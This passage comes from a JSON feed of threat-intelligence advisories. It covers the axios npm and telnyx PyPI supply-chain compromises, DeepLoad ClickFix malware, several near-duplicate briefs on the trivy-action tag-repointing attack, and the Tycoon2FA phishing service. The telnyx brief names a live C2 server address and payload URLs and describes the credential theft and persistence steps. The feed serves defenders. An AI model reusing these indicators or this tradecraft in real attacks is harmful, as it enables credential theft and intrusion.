Sigma rule (reference: Sigma rule - \u0026ldquo;Detect Suspicious Process Spawned by NPM\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-axios-supply-chain/","summary":"Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.","title":"Compromised Axios Library Leads to RAT Deployment via @usebruno/cli","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["deepload","clickfix","credential-theft","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDeepLoad is a recently discovered malware family designed for credential theft, malicious browser extension installation, and potential cryptocurrency theft. First advertised on a dark web forum in early February 2026, DeepLoad is now being distributed in the wild via ClickFix campaigns. The malware is delivered through fake browser error messages that instruct victims to execute a PowerShell command, resulting in the persistent execution of a PowerShell loader. This loader dynamically generates a DLL component in the Temp directory to evade detection. DeepLoad also injects into the legitimate \u003ccode\u003eLockAppHost.exe\u003c/code\u003e process to further blend into trusted Windows activity and evade detection by security tools. 
The threat actor\u0026rsquo;s motivations appear to be financially driven, focusing on credential and cryptocurrency theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim encounters a fake browser error message.\u003c/li\u003e\n\u003cli\u003eThe victim is instructed to paste a command into Windows Run or a terminal.\u003c/li\u003e\n\u003cli\u003eThe command executes a PowerShell loader, which is designed for persistence.\u003c/li\u003e\n\u003cli\u003eThe PowerShell loader drops a DLL component in the Temp directory, compiled on every execution with a different filename.\u003c/li\u003e\n\u003cli\u003eThe loader disables PowerShell command history and calls Windows core functions directly to evade monitoring.\u003c/li\u003e\n\u003cli\u003eThe DLL is injected into \u003ccode\u003eLockAppHost.exe\u003c/code\u003e using asynchronous procedure call (APC) injection.\u003c/li\u003e\n\u003cli\u003eDeepLoad steals credentials via a standalone credential stealer executed alongside the main loader.\u003c/li\u003e\n\u003cli\u003eA rogue browser extension is dropped to intercept user activity, including logins, open tabs, session tokens, and saved passwords. The malware also attempts to spread via USB drives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful DeepLoad infections can lead to significant credential theft, potentially compromising sensitive user accounts and data. The rogue browser extension can expose all user browser activity, including banking and cryptocurrency exchanges. The spread via USB drives allows the malware to propagate rapidly across an organization. The financial impact can be substantial if cryptocurrency wallets and other financial accounts are compromised. 
The number of affected organizations is currently unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect DeepLoad PowerShell Loader\u0026rdquo; Sigma rule to detect the initial PowerShell execution used to deliver the malware.\u003c/li\u003e\n\u003cli\u003eMonitor process injection into \u003ccode\u003eLockAppHost.exe\u003c/code\u003e to identify potential DeepLoad infections (reference the Sigma rule \u0026ldquo;Detect Injection into LockAppHost.exe\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eEnable PowerShell logging and review for suspicious command line arguments indicative of the DeepLoad loader to enhance the effectiveness of the \u0026ldquo;Detect DeepLoad PowerShell Loader\u0026rdquo; rule.\u003c/li\u003e\n\u003cli\u003eImplement USB drive security policies to prevent the spread of malware via removable media.\u003c/li\u003e\n\u003cli\u003eEducate users on the risks of executing commands from untrusted sources to prevent initial infection via ClickFix techniques.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T12:00:00Z","date_published":"2026-04-02T12:00:00Z","id":"/briefs/2026-04-deepload-malware/","summary":"The DeepLoad malware steals credentials, installs malicious browser extensions, spreads via USB drives, and is being distributed via ClickFix campaigns using PowerShell loaders.","title":"DeepLoad Malware Distributed via ClickFix","url":"https://feed.craftedsignal.io/briefs/2026-04-deepload-malware/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. 
Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner\u0026rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. 
Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.\u003c/li\u003e\n\u003cli\u003eStolen credentials are exfiltrated to a destination controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. 
The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview your GitHub Actions workflows for usage of \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and verify the integrity of the action\u0026rsquo;s code. Consider pinning to specific commit SHAs instead of tags to avoid tag repointing attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runner environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T08:36:29Z","date_published":"2026-03-31T08:36:29Z","id":"/briefs/2026-04-trivy-supply-chain/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in 
suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe attacker retroactively modifies existing Git tags (e.g., \u003ccode\u003e0.24.0\u003c/code\u003e) to point to a malicious commit.\u003c/li\u003e\n\u003cli\u003eThe malicious commit injects approximately 105 lines of malicious code into the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, prepended before the legitimate Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eA GitHub Actions workflow includes a step using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e by referencing a poisoned tag (e.g., \u003ccode\u003e- uses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and 
executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious code in \u003ccode\u003eentrypoint.sh\u003c/code\u003e enumerates running processes to identify potential credential sources and exfiltrates sensitive data.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner executes, masking the malicious activity.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacted organizations using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action\u0026rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. 
The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately audit your GitHub Actions workflows for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and update to a safe version (as provided by Aqua Security) or remove the action entirely.\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.\u003c/li\u003e\n\u003cli\u003eEnable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.\u003c/li\u003e\n\u003cli\u003eReview GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T07:24:09Z","date_published":"2026-03-31T07:24:09Z","id":"/briefs/2026-04-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.","title":"Compromised trivy-action GitHub Action Leads to Credential 
Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script to include malicious code for credential theft. 
Specifically, the attacker prepends approximately 105 lines of malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to retroactively poison existing release tags (e.g., \u003ccode\u003e@0.24.0\u003c/code\u003e) to point to the malicious commit.\u003c/li\u003e\n\u003cli\u003eDevelopers\u0026rsquo; CI/CD pipelines reference the compromised \u003ccode\u003etrivy-action\u003c/code\u003e using a poisoned tag (e.g., \u003ccode\u003eaquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a workflow runs, the GitHub Actions runner downloads and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, granting it access to the runner\u0026rsquo;s environment, secrets, and network.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential targets for credential theft.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates credentials and secrets.\u003c/li\u003e\n\u003cli\u003eThe original \u003ccode\u003etrivy\u003c/code\u003e scanner is executed, masking the malicious activity and allowing the workflow to complete normally.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etrivy-action\u003c/code\u003e GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of \u003ccode\u003etrivy-action\u003c/code\u003e, the potential impact is significant. 
Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipeline configurations for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security\u0026rsquo;s advisories.\u003c/li\u003e\n\u003cli\u003eImplement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T06:07:07Z","date_published":"2026-03-31T06:07:07Z","id":"/briefs/2026-04-trivy-action-compromise/","summary":"The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","pypi","credential-theft","teampcp"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the \u003ccode\u003etelnyx\u003c/code\u003e Python package on PyPI was compromised by TeamPCP, resulting in the distribution of malicious versions 4.87.1 and 4.87.2. 
The attacker, having gained unauthorized access to PyPI credentials, bypassed the legitimate GitHub release pipeline to upload these compromised packages directly. These versions contain malware designed to harvest sensitive credentials from infected systems and exfiltrate them to a command-and-control (C2) server. The malicious packages were available for approximately 6 hours before being quarantined by PyPI. Version 4.87.1 contained a typo preventing execution, making 4.87.2 the fully functional malicious version. This incident highlights the risk of supply chain attacks targeting open-source package repositories, potentially affecting any system that installed the \u003ccode\u003etelnyx\u003c/code\u003e package during the exposure window.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to PyPI credentials for the \u003ccode\u003etelnyx\u003c/code\u003e package.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads malicious versions 4.87.1 and 4.87.2 of the \u003ccode\u003etelnyx\u003c/code\u003e package to PyPI, bypassing the legitimate GitHub repository.\u003c/li\u003e\n\u003cli\u003eWhen a user installs or upgrades to the malicious \u003ccode\u003etelnyx\u003c/code\u003e package, the injected malware within \u003ccode\u003etelnyx/_client.py\u003c/code\u003e executes upon importing the library (\u003ccode\u003eimport telnyx\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eOn Linux/macOS systems, the malware spawns a detached subprocess to ensure persistence and downloads a payload hidden inside a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from the C2 server at \u003ccode\u003ehttp://83.142.209.203:8080/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload harvests sensitive credentials, including SSH keys, AWS/GCP/Azure credentials, Kubernetes tokens, Docker configurations, .env files, database credentials, and crypto 
wallets.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes access is detected, the malware deploys privileged pods to all nodes for lateral movement within the Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eThe collected data is encrypted using AES-256-CBC and RSA-4096, then exfiltrated to the C2 server, identified by the header \u003ccode\u003eX-Filename: tpcp.tar.gz\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eOn Windows, a binary payload hidden in \u003ccode\u003ehangup.wav\u003c/code\u003e is downloaded from \u003ccode\u003ehttp://83.142.209.203:8080/\u003c/code\u003e, dropped as \u003ccode\u003emsbuild.exe\u003c/code\u003e in the Startup folder for persistence, and executed with a hidden window, polling the endpoint \u003ccode\u003ehttp://83.142.209.203:8080/raw\u003c/code\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etelnyx\u003c/code\u003e PyPI package poses a significant risk to developers and organizations that use the library.  Successful exploitation leads to the theft of sensitive credentials, potentially granting the attacker unauthorized access to critical infrastructure, cloud resources, and sensitive data. TeamPCP\u0026rsquo;s previous campaign against LiteLLM and the similarities in this attack suggest a pattern of targeting open-source projects to infiltrate developer environments and steal secrets.  The impact includes potential data breaches, financial losses, and reputational damage. 
The exposure window was approximately 6 hours during which vulnerable versions were available.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately check for the presence of malicious \u003ccode\u003etelnyx\u003c/code\u003e package versions (4.87.1 or 4.87.2) in your environment using the provided commands and uninstall them (\u003ccode\u003epip uninstall telnyx\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDue to the credential-stealing nature of the malware, rotate all potentially exposed secrets, including SSH keys, cloud provider credentials (AWS, GCP, Azure), Kubernetes tokens, Docker registry credentials, database passwords, API keys in .env files, and Telnyx API keys.\u003c/li\u003e\n\u003cli\u003eCheck for persistence mechanisms used by the malware, specifically the \u003ccode\u003eaudiomon\u003c/code\u003e service and associated files on Linux/macOS, and the \u003ccode\u003emsbuild.exe\u003c/code\u003e executable in the Startup folder on Windows, based on the file paths provided in the \u0026ldquo;Filesystem\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eBlock the identified C2 IP address (\u003ccode\u003e83.142.209.203\u003c/code\u003e) and payload URLs (\u003ccode\u003ehttp://83.142.209.203:8080/ringtone.wav\u003c/code\u003e, \u003ccode\u003ehttp://83.142.209.203:8080/hangup.wav\u003c/code\u003e, \u003ccode\u003ehttp://83.142.209.203:8080/raw\u003c/code\u003e) at your network perimeter.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect the creation of \u003ccode\u003emsbuild.exe\u003c/code\u003e in the Startup folder.\u003c/li\u003e\n\u003cli\u003ePin the \u003ccode\u003etelnyx\u003c/code\u003e package to the safe version 4.87.0 in your project dependencies to prevent future installations of compromised 
versions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T19:15:30Z","date_published":"2026-03-30T19:15:30Z","id":"/briefs/2026-03-telnyx-pypi-compromise/","summary":"A threat actor compromised the PyPI package `telnyx`, uploading malicious versions 4.87.1 and 4.87.2 containing credential-stealing malware that exfiltrates data to a C2 server.","title":"Compromised Telnyx PyPI Package Distributes Credential-Stealing Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-telnyx-pypi-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike\u0026rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. 
Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains write access to the aquasecurity/trivy-action repository.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.\u003c/li\u003e\n\u003cli\u003eA developer\u0026rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., \u003ccode\u003euses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential credential sources.\u003c/li\u003e\n\u003cli\u003eThe script steals credentials and secrets from the runner\u0026rsquo;s environment, including API keys, deployment tokens, and cloud credentials.\u003c/li\u003e\n\u003cli\u003eAfter stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are used to gain unauthorized access to internal infrastructure and resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. 
Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).\u003c/li\u003e\n\u003cli\u003eConsider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T06:24:43Z","date_published":"2026-03-30T06:24:43Z","id":"/briefs/2026-03-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 4, 2026, Europol announced a technical disruption of Tycoon2FA, a subscription-based phishing-as-a-service (PhaaS) platform enabling 
cybercriminals to bypass MFA and compromise email accounts. The takedown involved seizing 330 domains. Despite this disruption, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and Tycoon2FA’s tactics, techniques, and procedures (TTPs) remain unchanged. This resurgence suggests that the actors behind Tycoon2FA are adaptive and persistent. Tycoon2FA began operations in 2023, and in mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. The platform also had a competitor named RaccoonO365, which law enforcement took down in September 2025.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictims receive phishing emails designed to mimic legitimate login pages.\u003c/li\u003e\n\u003cli\u003ePhishing emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.\u003c/li\u003e\n\u003cli\u003eUpon CAPTCHA validation, victims\u0026rsquo; session cookies are stolen by the attackers.\u003c/li\u003e\n\u003cli\u003eA JavaScript (JS) file extracts victims\u0026rsquo; email addresses.\u003c/li\u003e\n\u003cli\u003eVictims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.\u003c/li\u003e\n\u003cli\u003eVictims enter their credentials into the fake login pages, which are then captured by the attackers.\u003c/li\u003e\n\u003cli\u003eStolen credentials are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.\u003c/li\u003e\n\u003cli\u003eAttackers authenticate to the victim\u0026rsquo;s cloud environment using the stolen cookies and credentials, gaining unauthorized access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eTycoon2FA was responsible for 62% of all phishing attempts blocked by 
Microsoft in mid-2025, generating over 30 million malicious emails in a single month. Successful attacks lead to unauthorized access to victims\u0026rsquo; cloud environments, potentially resulting in data theft, business email compromise (BEC), and further malicious activities. Despite law enforcement takedowns, the platform\u0026rsquo;s rapid resurgence demonstrates the resilience of PhaaS operations and their potential for significant damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for connections to known phishing domains or newly registered domains, correlating with user agent strings and HTTP referrer headers common in phishing kits, to detect initial access attempts. Deploy the network_connection Sigma rule to identify suspicious connections.\u003c/li\u003e\n\u003cli\u003eImplement detections for suspicious JavaScript execution within browser environments attempting to steal session cookies or extract email addresses. Enable webserver and proxy logging to capture these events and deploy the process_creation Sigma rule to identify associated processes.\u003c/li\u003e\n\u003cli\u003eMonitor authentication logs for successful logins from unusual locations or using suspicious user agents after a user has visited a known phishing site. 
Analyze user authentication patterns and correlate with other security events to detect compromised accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-29T08:34:23Z","date_published":"2026-03-29T08:34:23Z","id":"/briefs/2026-03-tycoon2fa-persistence/","summary":"The Tycoon2FA phishing-as-a-service (PhaaS) platform, used to bypass MFA and compromise email accounts, saw a temporary decrease in activity after a law enforcement takedown, but cloud compromises have since returned to pre-disruption levels with unchanged TTPs, indicating continued threat actor activity.","title":"Tycoon2FA Phishing-as-a-Service Platform Persists After Takedown","url":"https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-persistence/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","pypi","credential theft","steganography"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the Telnyx package on the Python Package Index (PyPI) was compromised by the threat actor TeamPCP. Malicious versions 4.87.1 and 4.87.2 were uploaded, containing credential-stealing malware concealed within WAV audio files. This supply-chain attack targeted developers using the Telnyx Python SDK, a popular package with over 740,000 monthly downloads, used for integrating communication services into applications. The malicious code resides in the 